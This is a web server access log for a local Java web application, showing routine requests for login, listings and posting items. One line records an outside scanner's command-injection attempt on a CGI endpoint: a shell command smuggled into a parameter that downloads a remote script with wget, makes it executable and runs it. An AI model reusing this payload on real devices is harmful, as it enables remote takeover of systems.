0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:04 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:05 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 110
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 2425
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/lunbo4.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 21
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/lunbo1.jpg HTTP/1.1" 304 - http-bio-8080-exec-5 30
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/lunbo3.jpg HTTP/1.1" 304 - http-bio-8080-exec-1 24
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/lunbo2.jpg HTTP/1.1" 304 - http-bio-8080-exec-6 23
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/lunbo6.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/lunbo5.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 19
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/lunbo7.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 23
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/dd3c89a8-4620-4f70-a91b-da5a4a18b0a2.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 28
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:07 +0800] "GET /eswz/img/7d5e83e6-fb7f-4e88-9be0-69ce74d6203a.jpg HTTP/1.1" 304 - http-bio-8080-exec-9 13
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:08 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-9 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:13 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-9 15
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:17 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-9 39
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:21 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-9 26
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:24 +0800] "GET /eswz/index HTTP/1.1" 200 17827 http-bio-8080-exec-9 65
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:28 +0800] "GET /eswz/toinsertInformation HTTP/1.1" 200 1302 http-bio-8080-exec-9 140
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:29:34 +0800] "POST /eswz/doinsertInformation HTTP/1.1" 404 1035 http-bio-8080-exec-9 43
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:04 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:04 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 65
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:05 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 700
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:11 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-5 12
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:15 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 45
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:25 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-7 26
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:25 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-8 29
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:27 +0800] "GET /eswz/index HTTP/1.1" 200 17827 http-bio-8080-exec-9 78
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:32 +0800] "GET /eswz/toinsertInformation HTTP/1.1" 200 1302 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:54 +0800] "POST /eswz/doinsertInformation HTTP/1.1" 200 85 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:56 +0800] "GET /eswz/index HTTP/1.1" 200 17827 http-bio-8080-exec-10 60
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:32:58 +0800] "GET /eswz/toInformation HTTP/1.1" 200 7431 http-bio-8080-exec-10 66
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:33:11 +0800] "GET /eswz/toInformation?pageNo=2&pageSize=8&content= HTTP/1.1" 200 6412 http-bio-8080-exec-10 32
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:33:13 +0800] "GET /eswz/toInformation?pageNo=1&pageSize=8&content= HTTP/1.1" 200 7431 http-bio-8080-exec-10 34
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:34:14 +0800] "GET /eswz/getCart?userid=2 HTTP/1.1" 200 7117 http-bio-8080-exec-9 104
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:34:14 +0800] "GET /eswz/index.css HTTP/1.1" 200 17827 http-bio-8080-exec-9 50
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:34:20 +0800] "GET /eswz/index HTTP/1.1" 200 17827 http-bio-8080-exec-9 47
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:34:49 +0800] "GET /eswz/toMyGoods HTTP/1.1" 200 14021 http-bio-8080-exec-9 70
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:34:49 +0800] "GET /eswz/img/16.jpg HTTP/1.1" 304 - http-bio-8080-exec-8 27
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:34:49 +0800] "GET /eswz/img/12.jpg HTTP/1.1" 304 - http-bio-8080-exec-1 29
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:34:49 +0800] "GET /eswz/img/15.jpg HTTP/1.1" 304 - http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:34:49 +0800] "GET /eswz/index.css HTTP/1.1" 200 17827 http-bio-8080-exec-9 45
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:36:18 +0800] "GET /eswz/toAddGoods HTTP/1.1" 200 3269 http-bio-8080-exec-5 29
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:36:33 +0800] "GET /eswz/index HTTP/1.1" 200 17827 http-bio-8080-exec-5 42
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:36:54 +0800] "GET /eswz/detailGoods?goodsid=8 HTTP/1.1" 200 5201 http-bio-8080-exec-5 42
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:36:54 +0800] "GET /eswz/index.css HTTP/1.1" 200 17827 http-bio-8080-exec-5 48
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:37:01 +0800] "GET /eswz/toGoodsUser?userid=2 HTTP/1.1" 200 5702 http-bio-8080-exec-5 48
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:37:01 +0800] "GET /eswz/img/fdb20c8f-aac4-46a9-86cd-c4c209cf54f2.jpg HTTP/1.1" 304 - http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:37:18 +0800] "GET /eswz/toGoodsUser?userid=2 HTTP/1.1" 200 5702 http-bio-8080-exec-5 18
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:30 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:30 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 67
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:32 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 1093
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:34 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-6 16
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:40 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-8 41
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:48 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-9 31
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:50 +0800] "GET /eswz/index HTTP/1.1" 200 17827 http-bio-8080-exec-10 67
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:53 +0800] "GET /eswz/toinsertInformation HTTP/1.1" 200 1302 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:42:59 +0800] "POST /eswz/doinsertInformation HTTP/1.1" 200 85 http-bio-8080-exec-10 26
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:43:01 +0800] "GET /eswz/index HTTP/1.1" 200 17827 http-bio-8080-exec-10 60
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:43:03 +0800] "GET /eswz/toInformation HTTP/1.1" 200 7435 http-bio-8080-exec-10 60
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:45:49 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:45:49 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 74
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:45:50 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 788
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:45:54 +0800] "GET /eswz/toInformation HTTP/1.1" 500 13644 http-bio-8080-exec-5 41
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:46:42 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:46:42 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 63
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:46:43 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 737
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:46:46 +0800] "GET /eswz/toInformation HTTP/1.1" 200 6025 http-bio-8080-exec-6 71
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:47:51 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:47:51 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 51
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:47:52 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 715
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:48:02 +0800] "GET /eswz/toInformation HTTP/1.1" 500 15652 http-bio-8080-exec-5 127
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:50:27 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:50:27 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 63
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:50:27 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 721
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:50:32 +0800] "GET /eswz/toInformation HTTP/1.1" 500 14842 http-bio-8080-exec-5 117
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:51:56 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:51:56 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 88
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:51:57 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 942
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:52:00 +0800] "GET /eswz/toInformation HTTP/1.1" 500 14842 http-bio-8080-exec-5 114
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:52:49 +0800] "GET /eswz/toInformation HTTP/1.1" 500 14842 http-bio-8080-exec-1 30
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:52:53 +0800] "GET /eswz/toInformation HTTP/1.1" 500 14842 http-bio-8080-exec-6 30
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:53:50 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:53:50 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 87
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:53:51 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 841
0:0:0:0:0:0:0:1 - - [03/Dec/2022:15:53:53 +0800] "GET /eswz/toInformation HTTP/1.1" 200 5816 http-bio-8080-exec-5 66
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:04 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:04 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 69
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:05 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 1593
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:05 +0800] "GET /eswz/img/dd3c89a8-4620-4f70-a91b-da5a4a18b0a2.jpg HTTP/1.1" 304 - http-bio-8080-exec-5 15
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:05 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-6 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:07 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-7 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:09 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-8 26
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:19 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-9 12
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:20 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:22 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-10 36
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:24 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 5933 http-bio-8080-exec-10 165
0:0:0:0:0:0:0:1 - - [03/Dec/2022:21:59:24 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-10 51
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:01:39 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6069 http-bio-8080-exec-6 144
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:01:39 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-6 33
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:01:46 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6069 http-bio-8080-exec-6 159
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:01:46 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-6 43
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:01:47 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6069 http-bio-8080-exec-6 6
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:01:47 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-6 27
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:01:58 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6645 http-bio-8080-exec-10 113
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:01:58 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-10 37
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:03:05 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6647 http-bio-8080-exec-8 118
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:03:05 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-8 39
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:03:07 +0800] "GET /eswz/deleteInformation?id=2 HTTP/1.1" 302 - http-bio-8080-exec-8 18
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:03:07 +0800] "GET /eswz/toMyInformation?iuserid=2 HTTP/1.1" 200 6338 http-bio-8080-exec-8 6
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:03:07 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-8 22
85.31.44.178 - - [03/Dec/2022:22:03:50 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-5 0
85.31.44.178 - - [03/Dec/2022:22:03:50 +0800] "GET /cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http://185.132.53.105/f/strs.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel; HTTP/1.1" 404 - http-bio-8080-exec-10 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:15:57 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:15:57 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 39
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:15:58 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 682
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:15:59 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-5 12
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:16:05 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 20
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:16:08 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 15
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:16:09 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-8 38
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:16:12 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6346 http-bio-8080-exec-9 795
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:16:12 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-10 31
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:16:16 +0800] "GET /eswz/toupdateInformation?id=7 HTTP/1.1" 404 1031 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:30 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:30 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 35
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:31 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 481
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:33 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:36 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 21
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:39 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 14
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:40 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-8 29
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:42 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6346 http-bio-8080-exec-9 25
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:42 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-10 31
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:17:44 +0800] "GET /eswz/toupdateInformation?id=7 HTTP/1.1" 200 1302 http-bio-8080-exec-10 469
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:22:58 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:22:58 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 53
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:22:58 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 557
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:00 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:01 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 23
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:05 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-7 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:09 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-8 16
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:10 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-9 31
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:13 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6346 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:13 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-2 34
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:14 +0800] "GET /eswz/toupdateInformation?id=7 HTTP/1.1" 200 1391 http-bio-8080-exec-3 636
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:20 +0800] "POST /eswz/doinsertInformation HTTP/1.1" 200 85 http-bio-8080-exec-3 9
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:21 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-3 24
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:23:54 +0800] "GET /eswz/toInformation HTTP/1.1" 200 6583 http-bio-8080-exec-3 24
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:24:34 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-3 28
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:24:36 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 6715 http-bio-8080-exec-3 9
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:24:36 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-3 28
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:24:46 +0800] "GET /eswz/toupdateInformation?id=13 HTTP/1.1" 200 1447 http-bio-8080-exec-3 8
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:24:52 +0800] "POST /eswz/doinsertInformation HTTP/1.1" 200 85 http-bio-8080-exec-3 6
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:24:54 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-3 21
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:12 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:12 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 63
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:12 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 612
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:14 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:16 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 21
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:22 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-7 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:22 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-8 15
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:23 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-9 28
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:25 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 7027 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:25 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-10 27
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:28 +0800] "GET /eswz/toupdateInformation?id=13 HTTP/1.1" 200 1445 http-bio-8080-exec-10 486
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:32 +0800] "POST /eswz/updateInformation HTTP/1.1" 200 85 http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:26:33 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:31:15 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 7445 http-bio-8080-exec-7 190
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:31:15 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-9 31
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:03 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:03 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:03 +0800] "GET /eswz/index HTTP/1.1" 200 17028 http-bio-8080-exec-4 607
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:06 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2670 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:08 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 54 http-bio-8080-exec-6 19
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:11 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 11
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:12 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-8 30
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:15 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 8803 http-bio-8080-exec-9 24
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:15 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:33:22 +0800] "GET /eswz/toinsertInformation HTTP/1.1" 200 1302 http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:38 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 8803 http-bio-8080-exec-4 26
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:38 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-4 20
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:41 +0800] "GET /eswz/toupdateInformation?id=7 HTTP/1.1" 200 1370 http-bio-8080-exec-4 682
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:46 +0800] "POST /eswz/updateInformation HTTP/1.1" 200 85 http-bio-8080-exec-4 12
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:48 +0800] "GET /eswz/index HTTP/1.1" 200 17916 http-bio-8080-exec-4 20
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:51 +0800] "GET /eswz/toMyInformation HTTP/1.1" 200 8803 http-bio-8080-exec-4 17
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:51 +0800] "GET /eswz/index.css HTTP/1.1" 200 17916 http-bio-8080-exec-4 28
0:0:0:0:0:0:0:1 - - [03/Dec/2022:22:35:52 +0800] "GET /eswz/toupdateInformation?id=7 HTTP/1.1" 200 1370 http-bio-8080-exec-4 9
